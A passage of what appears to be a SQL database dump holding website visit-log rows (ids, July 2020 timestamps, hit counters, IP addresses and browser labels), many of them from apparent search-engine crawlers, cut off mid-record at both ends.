527288,1596028996,1,1,0,0,'37.73.143.80','chrome'),(527289,1596029268,1,1,0,0,'91.196.178.72','chrome'),(527290,1596029579,8,8,0,0,'185.11.82.228','other'),(527291,1596029586,1,1,0,0,'66.249.70.69','chrome'),(527292,1596029998,1,1,0,0,'66.249.70.70','chrome'),(527293,1596030268,2,2,0,0,'66.249.70.72','chrome'),(527294,1596030607,1,0,1,0,'66.249.64.36',''),(527295,1596030866,1,1,0,0,'91.196.178.170','chrome'),(527296,1596030992,8,8,0,0,'185.11.82.228','other'),(527297,1596031410,1,1,0,0,'8.29.198.26','other'),(527298,1596031474,1,1,0,0,'92.112.234.190','chrome'),(527299,1596031506,1,1,0,0,'207.46.13.139','other'),(527300,1596031676,1,1,0,0,'77.111.247.64','chrome'),(527301,1596031687,1,1,0,0,'66.249.70.70','chrome'),(527302,1596031774,1,1,0,0,'66.249.70.72','chrome'),(527303,1596031776,1,1,0,0,'91.196.178.170','chrome'),(527304,1596031908,1,1,0,0,'66.249.64.33','chrome'),(527305,1596031915,1,1,0,0,'207.46.13.98','other'),(527306,1596032244,1,1,0,0,'8.29.198.25','other'),(527307,1596032413,8,8,0,0,'185.11.82.228','other'),(527308,1596032877,1,1,0,0,'207.46.13.139','other'),(527309,1596032981,4,4,0,0,'66.249.70.70','chrome'),(527310,1596033230,1,1,0,0,'66.249.70.72','chrome'),(527311,1596033403,1,1,0,0,'66.249.64.33','chrome'),(527312,1596033804,8,8,0,0,'185.11.82.228','other'),(527313,1596034344,1,1,0,0,'207.46.13.98','other'),(527314,1596034610,1,1,0,0,'207.46.13.139','other'),(527315,1596035194,8,8,0,0,'185.11.82.228','other'),(527316,1596035551,2,2,0,0,'66.249.70.72','chrome'),(527317,1596035934,5,5,0,0,'66.249.70.69','chrome'),(527318,1596036530,1,1,0,0,'66.249.70.70','chrome'),(527319,1596036589,1,1,0,0,'66.249.70.72','chrome'),(527320,1596036663,8,8,0,0,'185.11.82.228','other'),(527321,1596037592,2,2,0,0,'66.249.70.72','chrome'),(527322,1596037873,3,3,0,0,'66.249.70.69','chrome'),(527323,1596037887,1,1,0,0,'66.249.64.33','chrome'),(527324,1596037930,1,1,0,0,'46.201.113.100','chrome'),(527325,1596038064,8,8,0,0,'185.11.82.228','other'),(527326,1596038502,4,4,0,0,'66.249.70.72','chrome'),(527327,1596038766,2,2,0,0,'66.249.70.70','chrome'),(527328,1596039478,8,8,0,0,'185.11.82.228','other'),(527329,1596040142,1,1,0,0,'66.249.70.72','chrome'),(527330,1596040310,1,1,0,0,'157.55.39.175','other'),(527331,1596040538,2,2,0,0,'157.55.39.84','other'),(527332,1596040677,2,2,0,0,'66.249.70.69','chrome'),(527333,1596040894,8,8,0,0,'185.11.82.228','other'),(527334,1596041452,1,1,0,0,'46.201.113.100','chrome'),(527335,1596041675,1,1,0,0,'66.249.70.72','chrome'),(527336,1596041800,2,2,0,0,'66.249.70.69','chrome'),(527337,1596042171,1,1,0,0,'207.46.13.139','other'),(527338,1596042238,1,1,0,0,'8.29.198.25','other'),(527339,1596042299,8,8,0,0,'185.11.82.228','other'),(527340,1596042444,1,1,0,0,'207.46.13.98','other'),(527341,1596042847,1,1,0,0,'66.249.70.70','chrome'),(527342,1596043067,1,1,0,0,'8.29.198.27','other'),(527343,1596043343,1,1,0,0,'66.249.64.38','chrome'),(527344,1596043661,8,8,0,0,'185.11.82.228','other'),(527345,1596043827,3,3,0,0,'66.249.70.72','chrome'),(527346,1596043983,1,1,0,0,'66.249.70.69','chrome'),(527347,1596044001,5,5,0,0,'66.249.70.70','chrome'),(527348,1596044153,1,1,0,0,'66.249.64.36','chrome'),(527349,1596044236,1,1,0,0,'157.55.39.84','other'),(527350,1596045061,8,8,0,0,'185.11.82.228','other'),(527351,1596045486,2,2,0,0,'66.249.70.72','chrome'),(527352,1596045529,3,3,0,0,'66.249.70.70','chrome'),(527353,1596045600,1,1,0,0,'37.73.143.80','chrome'),(527354,1596045859,1,1,0,0,'178.71.10.87','chrome'),(527355,1596046125,1,1,0,0,'37.73.143.80','other'),(527356,1596046503,8,8,0,0,'185.11.82.228','other'),(527357,1596047243,1,1,0,0,'66.249.70.72','chrome'),(527358,1596048011,8,8,0,0,'185.11.82.228','other'),(527359,1596048082,1,1,0,0,'66.249.70.69','chrome'),(527360,1596048490,2,2,0,0,'66.249.70.72','chrome'),(527361,1596048829,1,1,0,0,'66.249.64.36','chrome'),(527362,1596049234,1,1,0,0,'66.249.64.38','chrome'),(527363,1596049421,1,1,0,0,'66.249.70.70','chrome'),(527364,1596049486,1,1,0,0,'207.46.13.98','other'),(527365,1596049562,8,8,0,0,'185.11.82.228','other'),(527366,1596049859,2,2,0,0,'46.211.58.182','chrome'),(527367,1596050966,1,1,0,0,'88.155.189.137','chrome'),(527368,1596051039,1,1,0,0,'66.249.64.38','chrome'),(527369,1596051123,8,8,0,0,'185.11.82.228','other'),(527370,1596051339,2,2,0,0,'66.249.70.70','chrome'),(527371,1596051416,1,1,0,0,'207.46.13.139','other'),(527372,1596051472,2,2,0,0,'66.249.70.72','chrome'),(527373,1596051530,1,1,0,0,'157.55.39.84','other'),(527374,1596051571,1,1,0,0,'17.58.99.84','other'),(527375,1596052014,1,1,0,0,'66.249.64.33','chrome'),(527376,1596052247,2,2,0,0,'66.249.70.69','chrome'),(527377,1596052684,8,8,0,0,'185.11.82.228','other'),(527378,1596052995,1,1,0,0,'66.249.64.33','chrome'),(527379,1596053002,3,3,0,0,'66.249.70.72','chrome'),(527380,1596053071,1,1,0,0,'8.29.198.25','other'),(527381,1596053407,2,2,0,0,'66.249.70.70','chrome'),(527382,1596053422,1,1,0,0,'207.46.13.139','other'),(527383,1596053463,3,3,0,0,'66.249.70.69','chrome'),(527384,1596053482,1,1,0,0,'207.46.13.177','other'),(527385,1596053895,1,1,0,0,'8.29.198.27','other'),(527386,1596054082,1,1,0,0,'66.249.64.38','chrome'),(527387,1596054194,8,8,0,0,'185.11.82.228','other'),(527388,1596054467,1,1,0,0,'66.249.70.70','chrome'),(527389,1596055357,1,1,0,0,'66.249.64.36','chrome'),(527390,1596055449,4,4,0,0,'66.249.70.69','chrome'),(527391,1596055580,2,2,0,0,'66.249.70.70','chrome'),(527392,1596055689,8,8,0,0,'185.11.82.228','other'),(527393,1596055958,1,1,0,0,'207.46.13.177','other'),(527394,1596056241,4,4,0,0,'66.249.70.72','chrome'),(527395,1596056388,5,5,0,0,'201.82.49.152','chrome'),(527396,1596056726,2,2,0,0,'66.249.70.70','chrome'),(527397,1596057206,8,8,0,0,'185.11.82.228','other'),(527398,1596057379,1,1,0,0,'157.55.39.151','other'),(527399,1596057651,4,4,0,0,'66.249.70.69','chrome'),(527400,1596057758,3,3,0,0,'66.249.70.72','chrome'),(527401,1596058302,2,2,0,0,'66.249.70.70','chrome'),(527402,1596058371,1,1,0,0,'213.180.203.122','other'),(527403,1596058764,8,8,0,0,'185.11.82.228','other'),(527404,1596059442,1,1,0,0,'207.46.13.98','other'),(527405,1596059861,1,1,0,0,'157.55.39.84','other'),(527406,1596059865,2,2,0,0,'66.249.70.72','chrome'),(527407,1596059893,1,1,0,0,'178.154.200.222','other'),(527408,1596059915,1,1,0,0,'66.249.64.38','chrome'),(527409,1596060276,1,1,0,0,'66.249.64.33','chrome'),(527410,1596060395,8,8,0,0,'185.11.82.228','other'),(527411,1596061115,2,2,0,0,'66.249.70.72','chrome'),(527412,1596061690,1,1,0,0,'66.249.64.36','chrome'),(527413,1596061721,2,2,0,0,'66.249.64.33','chrome'),(527414,1596061873,1,1,0,0,'66.249.70.69','chrome'),(527415,1596061899,2,2,0,0,'66.249.70.70','chrome'),(527416,1596061923,8,8,0,0,'185.11.82.228','other'),(527417,1596061954,1,1,0,0,'207.46.13.139','other'),(527418,1596063170,3,3,0,0,'66.249.70.70','chrome'),(527419,1596063303,7,7,0,0,'66.249.70.69','chrome'),(527420,1596063473,8,8,0,0,'185.11.82.228','other'),(527421,1596063613,2,2,0,0,'66.249.70.72','chrome'),(527422,1596063907,2,2,0,0,'8.29.198.26','other'),(527423,1596064045,1,1,0,0,'66.249.64.38','chrome'),(527424,1596064340,2,2,0,0,'66.249.70.70','chrome'),(527425,1596064452,1,1,0,0,'17.58.99.84','other'),(527426,1596065043,8,8,0,0,'185.11.82.228','other'),(527427,1596065729,1,1,0,0,'66.249.64.36','chrome'),(527428,1596065841,1,1,0,0,'17.58.99.84','other'),(527429,1596066014,1,1,0,0,'207.46.13.98','other'),(527430,1596066421,2,2,0,0,'66.249.70.69','chrome'),(527431,1596066635,1,1,0,0,'66.249.64.38','chrome'),(527432,1596066636,8,8,0,0,'185.11.82.228','other'),(527433,1596066907,1,1,0,0,'62.205.134.182','other'),(527434,1596067042,1,1,0,0,'66.249.64.36','chrome'),(527435,1596067052,6,6,0,0,'179.32.185.65','chrome'),(527436,1596067301,2,2,0,0,'66.249.70.72','chrome'),(527437,1596067357,1,1,0,0,'66.249.70.70','chrome'),(527438,1596067367,2,2,0,0,'66.249.70.69','chrome'),(527439,1596068286,8,8,0,0,'185.11.82.228','other'),(527440,1596068415,1,1,0,0,'66.249.64.36','chrome'),(527441,1596068639,2,2,0,0,'66.249.70.72','chrome'),(527442,1596068827,1,1,0,0,'66.249.64.33','chrome'),(527443,1596068939,3,3,0,0,'66.249.70.69','chrome'),(527444,1596069010,1,1,0,0,'66.249.70.70','chrome'),(527445,1596069525,1,1,0,0,'18.180.78.113','other'),(527446,1596069667,2,2,0,0,'66.249.64.38','chrome'),(527447,1596069914,8,8,0,0,'185.11.82.228','other'),(527448,1596070353,3,3,0,0,'66.249.70.69','chrome'),(527449,1596070516,2,2,0,0,'66.249.70.72','chrome'),(527450,1596070618,1,1,0,0,'66.249.64.36','chrome'),(527451,1596070715,1,1,0,0,'66.249.70.70','chrome'),(527452,1596071596,8,8,0,0,'185.11.82.228','other'),(527453,1596071636,1,1,0,0,'178.154.200.222','other'),(527454,1596072129,2,2,0,0,'66.249.70.69','chrome'),(527455,1596073062,2,2,0,0,'66.249.70.72','chrome'),(527456,1596073208,1,1,0,0,'66.249.64.33','chrome'),(527457,1596073243,8,8,0,0,'185.11.82.228','other'),(527458,1596073981,1,1,0,0,'66.249.70.72','chrome'),(527459,1596074030,1,1,0,0,'193.106.30.99','firefox'),(527460,1596074150,1,1,0,0,'17.58.99.84','other'),(527461,1596074174,1,1,0,0,'66.249.70.70','chrome'),(527462,1596074738,1,1,0,0,'178.154.200.222','other'),(527463,1596074739,1,1,0,0,'8.29.198.25','other'),(527464,1596074924,8,8,0,0,'185.11.82.228','other'),(527465,1596074952,1,1,0,0,'66.249.64.33','chrome'),(527466,1596075552,1,1,0,0,'8.29.198.26','other'),(527467,1596075665,3,3,0,0,'66.249.70.70','chrome'),(527468,1596075797,3,3,0,0,'66.249.70.69','chrome'),(527469,1596076377,2,2,0,0,'66.249.70.72','chrome'),(527470,1596076630,8,8,0,0,'185.11.82.228','other'),(527471,1596076712,1,1,0,0,'66.249.64.38','chrome'),(527472,1596077023,2,2,0,0,'66.249.70.70','chrome'),(527473,1596077212,1,1,0,0,'217.171.147.164','chrome'),(527474,1596077756,1,1,0,0,'207.46.13.177','other'),(527475,1596078274,1,1,0,0,'66.249.70.70','chrome'),(527476,1596078342,8,8,0,0,'185.11.82.228','other'),(527477,1596079241,1,1,0,0,'157.55.39.132','other'),(527478,1596079936,1,1,0,0,'66.249.64.38','chrome'),(527479,1596080088,8,8,0,0,'185.11.82.228','other'),(527480,1596080250,1,1,0,0,'66.249.70.70','chrome'),(527481,1596081227,5,5,0,0,'66.249.70.69','chrome'),(527482,1596081596,4,4,0,0,'66.249.70.72','chrome'),(527483,1596081815,2,2,0,0,'66.249.70.70','chrome'),(527484,1596081832,8,8,0,0,'185.11.82.228','other'),(527485,1596082995,1,1,0,0,'66.249.70.70','chrome'),(527486,1596083097,1,1,0,0,'66.249.70.69','chrome'),(527487,1596083117,1,1,0,0,'131.220.6.152','chrome'),(527488,1596083290,2,2,0,0,'66.249.70.72','chrome'),(527489,1596084258,2,2,0,0,'66.249.70.72','chrome'),(527490,1596084396,8,8,0,0,'185.11.82.228','other'),(527491,1596084510,1,1,0,0,'213.180.203.16','chrome'),(527492,1596084670,1,1,0,0,'62.205.134.182','other'),(527493,1596084871,2,2,0,0,'66.249.70.69','chrome'),(527494,1596085315,1,1,0,0,'66.249.70.70','chrome'),(527495,1596085486,8,8,0,0,'185.11.82.228','other'),(527496,1596085574,2,2,0,0,'8.29.198.27','other'),(527497,1596086590,8,8,0,0,'185.11.82.228','other'),(527498,1596086607,2,2,0,0,'66.249.70.72','chrome'),(527499,1596086741,1,1,0,0,'95.216.96.245','other'),(527500,1596086810,4,4,0,0,'66.249.70.69','chrome'),(527501,1596087681,8,8,0,0,'185.11.82.228','other'),(527502,1596088581,1,1,0,0,'66.249.70.70','chrome'),(527503,1596088802,8,8,0,0,'185.11.82.228','other'),(527504,1596088859,1,1,0,0,'95.216.96.245','other'),(527505,1596088892,1,1,0,0,'37.73.104.78','chrome'),(527506,1596088994,3,3,0,0,'66.249.70.69','chrome'),(527507,1596089539,4,3,1,0,'66.249.70.70',''),(527508,1596089671,1,1,0,0,'66.249.64.36','chrome'),(527509,1596089877,1,1,0,0,'95.216.96.245','other'),(527510,1596089947,8,8,0,0,'185.11.82.228','other'),(527511,1596090326,1,1,0,0,'31.13.127.116','other'),(527512,1596090492,4,4,0,0,'66.249.70.69','chrome'),(527513,1596090498,1,1,0,0,'91.196.178.72','chrome'),(527514,1596090667,1,1,0,0,'66.249.70.70','chrome'),(527515,1596090825,1,1,0,0,'66.249.70.72','chrome'),(527516,1596091146,8,8,0,0,'185.11.82.228','other'),(527517,1596091633,2,2,0,0,'66.249.70.69','chrome'),(527518,1596091928,1,1,0,0,'92.113.126.13','firefox'),(527519,1596092263,1,1,0,0,'91.196.178.72','chrome'),(527520,1596092334,8,8,0,0,'185.11.82.228','other'),(527521,1596092375,1,1,0,0,'207.46.13.177','other'),(527522,1596092780,2,2,0,0,'66.249.70.72','chrome'),(527523,1596093566,8,8,0,0,'185.11.82.228','other'),(527524,1596093892,1,1,0,0,'66.249.64.38','chrome'),(527525,1596094021,2,2,0,0,'66.249.70.70','chrome'),(527526,1596094186,3,3,0,0,'66.249.70.72','chrome'),(527527,1596094848,8,8,0,0,'185.11.82.228','other'),(527528,1596095972,3,3,0,0,'66.249.70.70','chrome'),(527529,1596096038,3,3,0,0,'66.249.70.69','chrome'),(527530,1596096093,1,1,0,0,'66.249.70.72','chrome'),(527531,1596096155,8,8,0,0,'185.11.82.228','other'),(527532,1596096402,1,1,0,0,'8.29.198.25','other'),(527533,1596096631,1,1,0,0,'66.249.64.33','chrome'),(527534,1596097206,1,1,0,0,'8.29.198.27','other'),(527535,1596097219,1,1,0,0,'91.196.178.141','chrome'),(527536,1596097289,1,1,0,0,'66.249.70.72','chrome'),(527537,1596097409,8,8,0,0,'185.11.82.228','other'),(527538,1596098065,1,1,0,0,'207.46.13.98','other'),(527539,1596098196,1,1,0,0,'66.249.64.38','chrome'),(527540,1596098216,3,3,0,0,'66.249.70.72','chrome'),(527541,1596098445,1,1,0,0,'66.249.70.69','chrome'),(527542,1596098675,8,8,0,0,'185.11.82.228','other'),(527543,1596099331,1,1,0,0,'207.46.13.139','other'),(527544,1596099763,2,2,0,0,'66.249.70.72','chrome'),(527545,1596099784,1,1,0,0,'157.55.39.84','other'),(527546,1596099974,8,8,0,0,'185.11.82.228','other'),(527547,1596100240,4,4,0,0,'66.249.70.69','chrome'),(527548,1596101266,8,8,0,0,'185.11.82.228','other'),(527549,1596101282,1,1,0,0,'66.249.70.72','chrome'),(527550,1596101352,1,1,0,0,'66.249.64.33','chrome'),(527551,1596101438,3,3,0,0,'66.249.70.70','chrome'),(527552,1596102287,1,1,0,0,'66.249.70.69','chrome'),(527553,1596102562,8,8,0,0,'185.11.82.228','other'),(527554,1596102618,2,2,0,0,'66.249.70.70','chrome'),(527555,1596102777,1,1,0,0,'178.95.245.101','chrome'),(527556,1596102835,1,1,0,0,'37.120.203.72','other'),(527557,1596102901,1,1,0,0,'91.196.178.170','chrome'),(527558,1596103045,1,1,0,0,'157.55.39.132','other'),(527559,1596103617,1,1,0,0,'66.249.70.72','chrome'),(527560,1596103889,8,8,0,0,'185.11.82.228','other'),(527561,1596104935,2,2,0,0,'66.249.64.36','chrome'),(527562,1596104970,2,2,0,0,'66.249.70.69','chrome'),(527563,1596105380,8,8,0,0,'185.11.82.228','other'),(527564,1596105545,1,1,0,0,'66.249.70.70','chrome'),(527565,1596105779,1,1,0,0,'207.46.13.139','other'),(527566,1596105947,1,1,0,0,'66.249.70.72','chrome'),(527567,1596106919,8,8,0,0,'185.11.82.228','other'),(527568,1596107233,1,1,0,0,'8.29.198.25','other'),(527569,1596107419,2,2,0,0,'66.249.70.70','chrome'),(527570,1596107657,1,1,0,0,'212.26.142.26','firefox'),(527571,1596107694,1,1,0,0,'176.67.0.112','chrome'),(527572,1596108033,1,1,0,0,'8.29.198.27','other'),(527573,1596108131,1,1,0,0,'157.55.39.84','other'),(527574,1596108164,3,3,0,0,'66.249.70.72','chrome'),(527575,1596108415,1,1,0,0,'109.74.154.72','chrome'),(527576,1596108423,8,8,0,0,'185.11.82.228','other'),(527577,1596108455,3,3,0,0,'66.249.70.69','chrome'),(527578,1596108475,2,2,0,0,'66.249.64.33','chrome'),(527579,1596108807,1,1,0,0,'66.249.64.38','chrome'),(527580,1596109941,8,8,0,0,'185.11.82.228','other'),(527581,1596110345,1,1,0,0,'66.249.64.38','chrome'),(527582,1596110662,1,1,0,0,'66.249.70.70','chrome'),(527583,1596110860,1,1,0,0,'207.46.13.177','other'),(527584,1596111062,1,1,0,0,'37.73.198.57','chrome'),(527585,1596111474,8,8,0,0,'185.11.82.228','other'),(527586,1596111877,1,1,0,0,'157.55.39.132','other'),(527587,1596112155,1,1,0,0,'157.55.39.151','other'),(527588,1596112312,1,1,0,0,'66.249.64.38','chrome'),(527589,1596112529,2,2,0,0,'47.116.60.142','chrome'),(527590,1596112691,2,2,0,0,'82.202.204.118','chrome'),(527591,1596112695,3,3,0,0,'34.220.141.238','chrome'),(527592,1596113048,1,1,0,0,'66.249.70.69','chrome'),(527593,1596113230,8,8,0,0,'185.11.82.228','other'),(527594,1596113304,1,1,0,0,'207.46.13.139','other'),(527595,1596113721,1,1,0,0,'31.13.127.120','other'),(527596,1596113793,2,2,0,0,'91.196.178.72','chrome'),(527597,1596114183,2,2,0,0,'66.249.70.70','chrome'),(527598,1596114951,1,1,0,0,'66.249.64.38','chrome'),(527599,1596114987,8,8,0,0,'185.11.82.228','other'),(527600,1596115041,3,3,0,0,'66.249.70.69','chrome'),(527601,1596115297,1,1,0,0,'66.249.70.70','chrome'),(527602,1596115327,2,2,0,0,'66.249.70.72','chrome'),(527603,1596116215,3,3,0,0,'66.249.70.69','chrome'),(527604,1596116391,2,2,0,0,'66.249.64.36','chrome'),(527605,1596116729,8,8,0,0,'185.11.82.228','other'),(527606,1596117294,1,1,0,0,'66.249.64.33','chrome'),(527607,1596117339,2,2,0,0,'66.249.70.72','chrome'),(527608,1596117359,2,2,0,0,'66.249.70.70','chrome'),(527609,1596117394,4,4,0,0,'66.249.70.69','chrome'),(527610,1596117554,2,2,0,0,'157.55.39.84','other'),(527611,1596117575,1,1,0,0,'91.196.178.72','chrome'),(527612,1596118060,1,1,0,0,'8.29.198.25','other'),(527613,1596118358,1,1,0,0,'157.55.39.132','other'),(527614,1596118751,8,8,0,0,'185.11.82.228','other'),(527615,1596118854,1,1,0,0,'8.29.198.26','other'),(527616,1596119300,2,2,0,0,'66.249.70.72','chrome'),(527617,1596120123,3,3,0,0,'66.249.70.69','chrome'),(527618,1596120193,2,2,0,0,'66.249.70.70','chrome'),(527619,1596120879,1,1,0,0,'207.46.13.98','other'),(527620,1596121060,8,8,0,0,'185.11.82.228','other'),(527621,1596121161,1,1,0,0,'213.180.203.16','other'),(527622,1596121283,1,1,0,0,'157.55.39.132','other'),(527623,1596121347,3,3,0,0,'66.249.70.69','chrome'),(527624,1596121403,1,1,0,0,'66.249.64.36','chrome'),(527625,1596122269,2,2,0,0,'66.249.70.70','chrome'),(527626,1596122526,4,4,0,0,'66.249.70.69','chrome'),(527627,1596122835,2,2,0,0,'66.249.70.72','chrome'),(527628,1596123334,8,8,0,0,'185.11.82.228','other'),(527629,1596123478,1,1,0,0,'66.249.70.70','chrome'),(527630,1596124005,2,2,0,0,'66.249.70.69','chrome'),(527631,1596124608,1,1,0,0,'66.249.64.33','chrome'),(527632,1596124986,2,2,0,0,'66.249.70.69','chrome'),(527633,1596125176,1,1,0,0,'31.13.127.9','other'),(527634,1596125314,1,1,0,0,'66.249.70.72','chrome'),(527635,1596125339,1,1,0,0,'66.249.70.70','chrome'),(527636,1596125654,8,8,0,0,'185.11.82.228','other'),(527637,1596126417,4,4,0,0,'66.249.70.70','chrome'),(527638,1596127070,1,1,0,0,'66.249.70.69','chrome'),(527639,1596127350,1,1,0,0,'66.249.70.70','chrome'),(527640,1596127774,1,1,0,0,'66.249.64.38','chrome'),(527641,1596127890,1,1,0,0,'157.55.39.84','other'),(527642,1596128324,1,1,0,0,'66.249.64.36','chrome'),(527643,1596128338,8,8,0,0,'185.11.82.228','other'),(527644,1596128598,1,1,0,0,'207.46.13.139','other'),(527645,1596128885,2,2,0,0,'8.29.198.26','other'),(527646,1596128959,2,2,0,0,'66.249.70.69','chrome'),(527647,1596129029,1,1,0,0,'157.55.39.132','other'),(527648,1596130190,1,1,0,0,'5.253.206.148','msie'),(527649,1596130469,1,1,0,0,'157.55.39.84','other'),(527650,1596130706,2,2,0,0,'66.249.70.69','chrome'),(527651,1596130806,1,1,0,0,'66.249.70.72','chrome'),(527652,1596130842,4,4,0,0,'66.249.70.70','chrome'),(527653,1596130932,8,8,0,0,'185.11.82.228','other'),(527654,1596131409,2,2,0,0,'207.46.13.177','other'),(527655,1596131523,1,1,0,0,'157.55.39.132','other'),(527656,1596132052,1,1,0,0,'207.46.13.98','other'),(527657,1596132328,1,1,0,0,'66.249.64.33','chrome'),(527658,1596132398,3,3,0,0,'66.249.70.70','chrome'),(527659,1596132721,2,2,0,0,'66.249.70.69','chrome'),(527660,1596132731,1,1,0,0,'66.249.64.38','chrome'),(527661,1596133470,6,6,0,0,'94.130.9.183','other'),(527662,1596133629,8,8,0,0,'185.11.82.228','other'),(527663,1596133857,3,3,0,0,'66.249.70.70','chrome'),(527664,1596134399,1,1,0,0,'66.249.70.69','chrome'),(527665,1596136401,1,1,0,0,'37.120.203.72','msie'),(527666,1596136557,8,8,0,0,'185.11.82.228','other'),(527667,1596136676,1,1,0,0,'66.249.70.70','chrome'),(527668,1596137481,6,6,0,0,'89.25.60.149','chrome'),(527669,1596137681,2,2,0,0,'157.55.39.132','other'),(527670,1596139714,2,2,0,0,'8.29.198.27','other'),(527671,1596139748,8,8,0,0,'185.11.82.228','other'),(527672,1596139916,1,1,0,0,'173.252.111.6','other'),(527673,1596139948,1,1,0,0,'66.249.70.72','chrome'),(527674,1596140024,1,1,0,0,'157.55.39.132','other'),(527675,1596140702,1,1,0,0,'37.73.8.185','chrome'),(527676,1596141952,1,1,0,0,'207.46.13.98','other'),(527677,1596142760,2,2,0,0,'157.55.39.84','other'),(527678,1596142931,8,8,0,0,'185.11.82.228','other'),(527679,1596144370,1,1,0,0,'157.55.39.84','other'),(527680,1596144629,1,1,0,0,'207.46.13.139','other'),(527681,1596145110,1,1,0,0,'161.35.151.28','chrome'),(527682,1596146132,8,8,0,0,'185.11.82.228','other'),(527683,1596146735,1,1,0,0,'66.249.70.72','chrome'),(527684,1596146911,1,0,1,0,'66.249.70.70',''),(527685,1596149614,1,1,0,0,'66.249.70.69','chrome'),(527686,1596149737,8,8,0,0,'185.11.82.228','other'),(527687,1596150348,1,1,0,0,'207.46.13.98','other'),(527688,1596150542,1,1,0,0,'8.29.198.27','other'),(527689,1596151339,1,1,0,0,'8.29.198.26','other'),(527690,1596152146,12,12,0,0,'180.191.138.31','chrome'),(527691,1596152148,1,1,0,0,'66.249.70.72','chrome'),(527692,1596153307,1,1,0,0,'62.205.134.182','other'),(527693,1596153374,8,8,0,0,'185.11.82.228','other'),(527694,1596154074,1,1,0,0,'207.46.13.47','other'),(527695,1596154726,2,2,0,0,'66.249.70.72','chrome'),(527696,1596155042,1,1,0,0,'66.249.64.33','chrome'),(527697,1596155488,1,1,0,0,'66.249.64.38','chrome'),(527698,1596155962,1,1,0,0,'157.55.39.84','other'),(527699,1596157007,8,8,0,0,'185.11.82.228','other'),(527700,1596157359,2,2,0,0,'66.249.70.70','chrome'),(527701,1596157364,1,1,0,0,'66.249.64.36','chrome'),(527702,1596157632,6,6,0,0,'177.201.81.160','chrome'),(527703,1596157705,1,1,0,0,'66.249.70.72','chrome'),(527704,1596157958,1,1,0,0,'178.154.200.222','other'),(527705,1596158275,2,2,0,0,'157.55.39.132','other'),(527706,1596158921,1,1,0,0,'37.120.203.72','opera'),(527707,1596158946,2,2,0,0,'207.46.13.98','other'),(527708,1596159250,1,1,0,0,'66.249.70.72','chrome'),(527709,1596159590,1,1,0,0,'157.55.39.132','other'),(527710,1596160504,1,1,0,0,'66.249.70.72','chrome'),(527711,1596160598,8,8,0,0,'185.11.82.228','other'),(527712,1596161368,2,2,0,0,'8.29.198.26','other'),(527713,1596161389,1,1,0,0,'207.46.13.98','other'),(527714,1596162079,2,2,0,0,'66.249.70.69','chrome'),(527715,1596162521,3,3,0,0,'66.249.70.70','chrome'),(527716,1596163989,1,1,0,0,'207.46.13.139','other'),(527717,1596164140,8,8,0,0,'185.11.82.228','other'),(527718,1596164251,2,2,0,0,'66.249.70.72','chrome'),(527719,1596164291,3,3,0,0,'66.249.70.69','chrome'),(527720,1596164577,1,1,0,0,'66.249.70.70','chrome'),(527721,1596166122,2,2,0,0,'66.249.70.72','chrome'),(527722,1596166254,2,2,0,0,'207.46.13.47','other'),(527723,1596166654,1,1,0,0,'66.249.70.69','chrome'),(527724,1596167573,8,8,0,0,'185.11.82.228','other'),(527725,1596168013,2,2,0,0,'66.249.70.70','chrome'),(527726,1596168119,2,2,0,0,'66.249.70.72','chrome'),(527727,1596168410,1,1,0,0,'66.249.70.69','chrome'),(527728,1596169047,1,1,0,0,'66.249.70.72','chrome'),(527729,1596169829,1,1,0,0,'66.249.70.69','chrome'),(527730,1596170382,1,1,0,0,'157.55.39.132','other'),(527731,1596170592,3,3,0,0,'66.249.70.70','chrome'),(527732,1596170617,1,1,0,0,'66.249.64.36','chrome'),(527733,1596170795,8,8,0,0,'185.11.82.228','other'),(527734,1596171080,1,1,0,0,'131.220.6.152','chrome'),(527735,1596171239,1,1,0,0,'62.205.134.182','other'),(527736,1596171806,2,2,0,0,'66.249.70.72','chrome'),(527737,1596171914,8,8,0,0,'185.11.82.228','other'),(527738,1596172190,1,1,0,0,'8.29.198.26','other'),(527739,1596172970,2,2,0,0,'66.249.70.70','chrome'),(527740,1596172983,1,1,0,0,'8.29.198.25','other'),(527741,1596173041,8,8,0,0,'185.11.82.228','other'),(527742,1596173165,1,1,0,0,'66.249.70.72','chrome'),(527743,1596173376,1,1,0,0,'66.249.64.38','chrome'),(527744,1596173735,1,1,0,0,'157.55.39.132','other'),(527745,1596174193,8,8,0,0,'185.11.82.228','other'),(527746,1596174902,1,1,0,0,'66.249.70.72','chrome'),(527747,1596174915,1,1,0,0,'207.46.13.47','other'),(527748,1596175387,8,8,0,0,'185.11.82.228','other'),(527749,1596175839,1,1,0,0,'66.249.70.72','chrome'),(527750,1596175844,1,1,0,0,'66.249.70.69','chrome'),(527751,1596176030,1,1,0,0,'66.249.64.33','chrome'),(527752,1596176569,8,8,0,0,'185.11.82.228','other'),(527753,1596176760,1,1,0,0,'157.55.39.84','other'),(527754,1596176977,2,2,0,0,'66.249.64.33','chrome'),(527755,1596176990,1,1,0,0,'207.46.13.139','other'),(527756,1596177148,1,1,0,0,'66.249.70.72','chrome'),(527757,1596177553,1,1,0,0,'91.196.178.170','chrome'),(527758,1596177757,8,8,0,0,'185.11.82.228','other'),(527759,1596177815,1,1,0,0,'207.46.13.98','other'),(527760,1596178221,2,2,0,0,'91.209.11.236','other'),(527761,1596178277,2,2,0,0,'66.249.70.72','chrome'),(527762,1596178427,1,1,0,0,'46.201.18.232','chrome'),(527763,1596178689,2,2,0,0,'66.249.70.70','chrome'),(527764,1596178808,2,2,0,0,'66.249.70.69','chrome'),(527765,1596179016,8,8,0,0,'185.11.82.228','other'),(527766,1596179453,2,2,0,0,'91.209.11.236','other'),(527767,1596179625,1,1,0,0,'91.196.178.72','chrome'),(527768,1596179757,1,1,0,0,'66.249.70.69','chrome'),(527769,1596180056,1,1,0,0,'212.1.124.210','firefox'),(527770,1596180107,1,1,0,0,'95.132.34.60','chrome'),(527771,1596180228,8,8,0,0,'185.11.82.228','other'),(527772,1596180611,2,2,0,0,'91.209.11.236','other'),(527773,1596180651,1,1,0,0,'66.249.64.36','chrome'),(527774,1596180735,1,1,0,0,'66.249.70.70','chrome'),(527775,1596180876,4,4,0,0,'66.249.70.72','chrome'),(527776,1596180981,1,1,0,0,'66.249.70.69','chrome'),(527777,1596181307,1,1,0,0,'37.53.90.175','chrome'),(527778,1596181322,1,1,0,0,'66.249.64.33','chrome'),(527779,1596181469,8,8,0,0,'185.11.82.228','other'),(527780,1596181869,2,2,0,0,'66.249.70.72','chrome'),(527781,1596182121,1,1,0,0,'91.196.178.72','chrome'),(527782,1596182742,8,8,0,0,'185.11.82.228','other'),(527783,1596182877,3,3,0,0,'66.249.70.70','chrome'),(527784,1596183019,1,1,0,0,'8.29.198.27','other'),(527785,1596183168,1,1,0,0,'